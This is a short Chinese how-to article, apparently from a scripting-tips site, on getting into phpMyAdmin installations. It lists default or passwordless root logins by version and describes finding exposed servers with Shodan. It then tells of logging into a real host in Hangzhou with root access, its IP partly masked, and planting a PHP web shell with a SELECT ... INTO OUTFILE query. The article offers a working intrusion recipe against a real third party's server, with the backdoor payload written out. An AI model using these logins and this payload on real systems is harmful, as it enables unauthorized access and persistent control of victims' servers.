主页 > 知识库 > phpMyAdmin通过密码漏洞留后门文件

phpMyAdmin通过密码漏洞留后门文件

热门标签:苏州外呼系统有效果吗 兼职做地图标注好赚钱吗 亳州企业外呼系统 地图标注怎么做商户验证 山东电销卡外呼系统原理是什么 智能电销语音机器人资讯 海南外呼系统方案 400 电话 办理 打开百度地图标注
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

地址已手动打码。

http://121.***.*.219:80/

登陆成功(root 权限)。

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对脚本之家的支持。如果你想了解更多相关内容请查看下面相关链接

您可能感兴趣的文章:
  • PHP中的变量覆盖漏洞深入解析
  • PHP网站常见安全漏洞,及相应防范措施总结
  • phpcmsv9.0任意文件上传漏洞解析
  • PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
  • 由php中字符offset特征造成的绕过漏洞详解
  • PHP-CGI远程代码执行漏洞分析与防范
  • 你不知道的文件上传漏洞php代码分析
  • PHP序列化/对象注入漏洞分析
  • PHP常见漏洞攻击分析
  • PHP编程中的常见漏洞和代码实例
  • 详解各种PHP函数漏洞

标签:绥化 温州 绍兴 清远 莱芜 呼伦贝尔 安康 金华

巨人网络通讯声明:本文标题《phpMyAdmin通过密码漏洞留后门文件》,本文关键词  phpMyAdmin,通过,密码,漏洞,;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 下面列出与本文章《phpMyAdmin通过密码漏洞留后门文件》相关的同类信息!
  • 本页收集关于phpMyAdmin通过密码漏洞留后门文件的相关信息资讯供网民参考!
  • 企业400电话

    智能AI客服机器人
    15000

    在线订购

    合计11份范本:公司章程+合伙协议+出资协议+合作协议+股权转让协议+增资扩股协议+股权激励+股东会决议+董事会决议

    推荐文章